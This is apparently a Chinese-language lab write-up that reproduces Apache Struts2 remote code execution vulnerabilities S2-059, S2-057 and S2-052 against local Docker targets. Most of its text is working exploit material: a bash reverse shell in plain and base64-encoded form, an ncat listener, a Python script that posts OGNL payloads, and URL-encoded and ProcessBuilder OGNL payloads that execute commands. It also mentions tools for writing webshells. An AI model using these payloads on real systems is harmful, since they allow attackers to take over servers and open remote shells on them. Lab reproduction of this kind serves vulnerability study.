s2-061已經複現過了,低版本漏洞可以使用k8哥哥和安恒的工具完成檢測和寫馬,就不再做複現了,當然也可以使用漏掃去發現漏洞。
s2-059
漏洞描述:
攻擊者可以通過構造惡意的OGNL表達式,并将其設定到可被外部輸入進行修改,且會執行OGNL表達式的Struts2标簽的屬性值,引發OGNL表達式解析,最終造成遠端代碼執行的影響。
影響版本:
Struts 2.0.0 – Struts 2.5.20
漏洞複現:
還是利用docker去搭建,搭建完直接驗證漏洞是否存在
反彈shell,進行base64編碼,編碼站點:
http://www.jackson-t.ca/runtime-exec-payloads.html
編碼前:
bash -i >& /dev/tcp/192.168.137.136/5555 0>&1
編碼之後:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzYvNTU1NSAwPiYxCg==}|{base64,-d}|{bash,-i}
利用ncat去做監聽:
ncat.exe -lvvp 5555
利用python腳本反彈shell,修改攻擊位址,修改bash反彈語句:
import requestsurl = "http://192.168.137.128:8080"data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}data2 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@[email protected]_MEMBER_ACCESS)).(@[email protected]().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzYvNTU1NSAwPiYxCg==}|{base64,-d}|{bash,-i}'))}"}res1 = requests.post(url, data=data1)# print(res1.text)res2 = requests.post(url, data=data2)# print(res2.text)
執行完是沒有回顯
已經反彈回來
s2-057
漏洞描述:
定義XML配置時如果namespace值未設定且上層動作配置(Action Configuration)中未設定或用通配符namespace時可能會導緻遠端代碼執行。
url标簽未設定value和action值且上層動作未設定或用通配符namespace時可能會導緻遠端代碼執行。
http://192.168.137.128:8080/struts2-showcase/$%7B1+1%7D/actionChain1.action
$%7B1+1%7D為url編碼,解碼為:${1+1},記得進行編碼,否則ognl表達式不會執行成功
windows:http://192.168.137.128:8080/struts2-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec('calc').getInputStream()%2c%23b%3dnew%20java.io.InputStreamReader(%23a)%2c%23c%3dnew %20java.io.BufferedReader(%23b)%2c%23d%3dnew%20char%5b51020%5d%2c%23c.read(%23d)%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23sbtest.println(%23d)%2c%23sbtest.close())%7d/actionChain1.action
Linux:http://192.168.137.128:8080/struts2-showcase/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27touch /tmp/js%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
docker:http://192.168.137.128:8080/struts2-showcase/actionchaining/$%7B(%23ct=%23request['struts.valueStack'].context).(%23cr=%23ct['com.opensymphony.xwork2.ActionContext.container']).(%23ou=%23cr.getInstance(@[email protected])).(%23ou.setExcludedClasses('java.lang.Shutdown')).(%23ou.setExcludedPackageNames('sun.reflect.')).(%[email protected]@DEFAULT_MEMBER_ACCESS).(%23ct.setMemberAccess(%23dm)).(%[email protected]@getRuntime().exec('touch /tmp/js'))%7D/actionChain1.action
s2-052
漏洞描述:
Struts2在使用Freemarker模闆引擎的時候,同時允許解析OGNL表達式。導緻使用者輸入的資料本身不會被OGNL解析,但由于被Freemarker解析一次後變成離開一個表達式,被OGNL解析第二次,導緻任意指令執行漏洞。
影響版本:
Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10
通路hello.action
http://192.168.137.128:8080/hello.action
payload:%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@[email protected](#process.getInputStream()))}
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@[email protected](#process.getInputStream()))}